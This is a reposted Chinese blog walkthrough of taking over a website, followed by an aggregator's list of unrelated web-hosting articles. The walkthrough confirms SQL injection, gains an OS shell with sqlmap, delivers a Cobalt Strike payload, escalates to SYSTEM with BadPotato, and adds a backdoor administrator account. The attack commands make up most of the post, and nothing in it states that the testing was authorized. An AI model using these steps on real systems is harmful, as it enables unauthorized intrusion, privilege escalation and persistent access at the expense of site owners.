利用cobaltstrike加sqlmap拿下一个网站并提权

news/2024/5/15 3:00:43/文章来源:https://blog.csdn.net/weixin_45945976/article/details/109208433

利用cobaltstrike加sqlmap拿下一个网站并提权
Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。
Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。

拿到一个网站时,单引号测试是否存在注入点:
在这里插入图片描述
在这里插入图片描述
数据库返回错误;说明大概率存在注入点。

sqlmap跑一遍,发现存在注入点:
sqlmap.py -u http://10.6.18.106/Info/InfoDetail.aspx?id=421 --batch
在这里插入图片描述
利用:sqlmap.py -u http://10.6.18.106/Info/InfoDetail.aspx?id=421 --os-shell --batch,来执行操作系统命令:
在这里插入图片描述
之后我们用到cobaltstrike:
开启cobaltstrike:
在这里插入图片描述
在这里插入图片描述

新建一个scripted web delivery攻击,

在这里插入图片描述
复制里面这段代码到刚才配置好的sqlmap中,
在这里插入图片描述
此时,cobaltstrike上如果有了目标ip,说明攻击成功!
在这里插入图片描述
尝试创建用户:shell net user adas /add
在这里插入图片描述
失败!说明权限不够~ shell systeminfo 查看操作系统版本信息:
在这里插入图片描述
在这里插入图片描述
服务器为windows 2012,接下来的思路是:寻找上传点,配合badpotato.exe尝试进行提权:
在这里插入图片描述
在这里插入图片描述
上传成功!
尝试提权~
shell C:\nmgeip\BadPotatoNet2.exe “whoami”
在这里插入图片描述
可以看到此时的权限为系统权限,提权成功!!!
添加用户:shell C:\nmgeip\BadPotatoNet2.exe “net user lianxi /add”
在这里插入图片描述
添加到管理员组:shell C:\nmgeip\BadPotatoNet2.exe “net localgroup administrators lianxi /add”
在这里插入图片描述
完成!
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_889119.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MSBuilder(1)--------利用vs2005发布asp.net网站到远程服务器上

MSBuilder--------利用vs2005发布asp.net网站到远程服务器上 找了两篇文章将问题解决了 英文好的可以可看 http://msdn.microsoft.com/en-us/magazine/cc163448.aspx 不但说明了,如何部署,还说明了通过动态配置保证在不同的服务器上生成不一样的发布数据比如web.config 中文…

大型网站架构演变和知识体系

之前也有一些介绍大型网站架构演变的文章,例如LiveJournal的、ebay的,都是非常值得参考的,不过感觉他们讲的更多的是每次演变的结果,而没有很详细的讲为什么需要做这样的演变,再加上近来感觉有不少同学都很难明白为什么…

大型网站架构演变和知识体系

之前也有一些介绍大型网站架构演变的文章,例如LiveJournal的、ebay的,都是非常值得参考的,不过感觉他们讲的更多的是每次演变的结果,而没有很详细的讲为什么需要做这样的演变,再加上近来感觉有不少同学都很难明白为什么…

云图说|云闪课·OBS学堂·02期 - 使用自定义域名配置静态网站托管

OBS学堂上期回顾:云图说|云闪课OBS学堂01期 - 托管静态网站, 助您简化建站流程 本期介绍的是云闪课-OBS学堂第二期:使用自定义域名配置静态网站托管 通过上一期的云图说,想必您一定对使用OBS托管静态网站有了一定的了…

云图说|云闪课·OBS学堂·01期 - 托管静态网站, 助您简化建站流程

华为云云闪课云图说系列,通过图形化说明,将云服务操作简单生动的以小课堂的形式教您快速上手云服务。 本期介绍的是云闪课-OBS学堂第一期:托管静态网站, 助您简化建站流程。 华为云对象存储服务OBS是稳定、安全、高效、易用的云…

教你如何更改网站数据的保存路径

步骤: 1、创建保存网站数据的目录,并创建网站的首页信息 2、修改httpd服务的主配置文件 3、重启服务 4、发现无法访问网站,涉及到SELinux,查看当前SELinux的状态 如果状态不是enforcing,则进入SELinux的主配置文件中进…

在linux中部署虚拟网站主机----IP访问

1、在网卡中添加主机的ip 2、重启网卡 3、验证添加的ip可用,即可ping通 4、创建各个ip主机所需存放网站数据的工作目录访问页面index.html 5、配置httpd的主配置文件重启生效开机自启 6、无法访问,看看是否为selinux上下文导致的原因 7、查看原来网站的存…

linux中部署虚拟网站主机----域名访问

1、添加域名 2、验证所添加的域名可以使用----ping 3、分别创建各个域名所存放的网站数据的目录文件并且创建首页的访问页面 4、配置httpd的主配置文件重启生效开机自启 5、查看selinux的上下文 6、更改上下文 7、立即生效 实验: 1、添加域名 vim /etc/hosts 2、验…

linux中部署虚拟网站主机----端口访问

1、创建和端口相关的目录文件以保存网站的数据创建首页信息index.html 2、配置httpd主配置文件 3、查看selinux上下文 4、设置上下文 5、立即生效 6、重启服务—无法访问,selinux发现所添加的端口不属于Apache所需资源 7、查看与httpd服务相关的selinux服务允许的端…

TA(技术美术)宝藏网站

TA(技术美术)宝藏网站 我们不生产TA我们只是TA的搬运工(感谢马甲大佬总结!?)T部分(技术相关)1.Shadertoy2.GLSL SandboX3.candycat的博客4.关于raymarching5.minionsart大神6.冯委大…

‘斗图啦’网站爬虫

目标: 爬取“斗图啦”的表情包前一百页 虽然这是一个小爬虫,但所用到库还真不少,比如,requests,lxml,os,re等 下面先把源代码献上: ‘’’ import requests from lxml import etre…

第一个个人网站

网址:首页-Quicky Sharing 使用文档:使用文档-Quicky Sharing 后续会添加微信扫码登录等必要功能

debian服务器linux服务器web建站搭建linux服务器之Debian安装

debian服务器linux服务器web建站搭建linux服务器之Debian安装 debian服务器linux服务器web建站搭建linux服务器之Debian安装 大家都知道linux的发行版本很多,有centos啊,debian啊,ubuntu等,下面我就用debian服务器为例教大家如何…

如何让自己的网站快速被百度收录(方法一)

首先让大家了解一下利用百度站长平台来让百度收录 需要在百度站长平台提交自己的网址。 下面这个快速收录,2020年7月份之前仅仅对部分优质站点开放,之后基本上是不开放的,所以我们选择普通收录。 普通收录普通收录工具可以向百度搜索主动推送…

如何让自己的网站收录流量飙升

文章来自执笔写ta的艾上网。 今天西安seo顾问就来说说网站收录一直下降我们应该怎么办,我们前面在其他平台也发布了不少关于网站收录下降的文章,但是最近好些朋友还是问我收录下降的问题,不过要是大多数网站都收录都下降的话,那么…

网站文章如何快速被收录?百度快速收录功能可以试一下

文章 来自i火吧,近日百度站长管理平台推出了快速收录功能,据了解该功能目前仅对部分优质的站点开放,但是开通熊掌号的站点也可以直接继承过来的。下面让我们一起来了看看吧。 一、百度快速收录上线 2020年5月13日下午,百度站长管…

影响网站打开速度的9大因素

再好的网站,如果打开速度慢,10个人会有9个人选择离开,我归纳了大约9大影响网站打开速度的因素,但网站页面显示的速度取决于众多的因素,包括服务器性能、网络传输质量、网站的带宽、DNS解析、网页内容包括涉及到的JS代码…

discuz所有版本通用!论坛后台SEO优化设置

不管是做什么样的论坛我们都要完善论坛功能和内容的同时,兼顾论坛的各方面SEO设置,毕竟一般的论坛大部分流量还是来源于搜索引擎的, 所以今天给discuz建站的新手们一点SEO设置方面的指导。 注意:今天说的是论坛SEO的基本设置&…

网站被挂马怎么办呢?如何防止网站被挂马?

网站被挂马&#xff1f;如何防止网站被挂马&#xff1f;各种挂马方式&#xff01;请参考 对于网站被人恶意加上一段<script></script><iframe></iframe>的代码而烦心不已。轻则导致访问者被迫访问某些网站或广告以至机器、重则被强制安装各种木马病毒&…

Linux-Apache-MySQL-PHP网站架构方案分析

LAMP&#xff08;Linux-Apache-MySQL-PHP&#xff09;网站架构是目前国际流行的Web框架&#xff0c;该框架包括&#xff1a;Linux操作系统&#xff0c;Apache网络服务器&#xff0c;MySQL数据库&#xff0c;Perl、PHP或者Python编程语言&#xff0c;所有组成产品均是开源软件&a…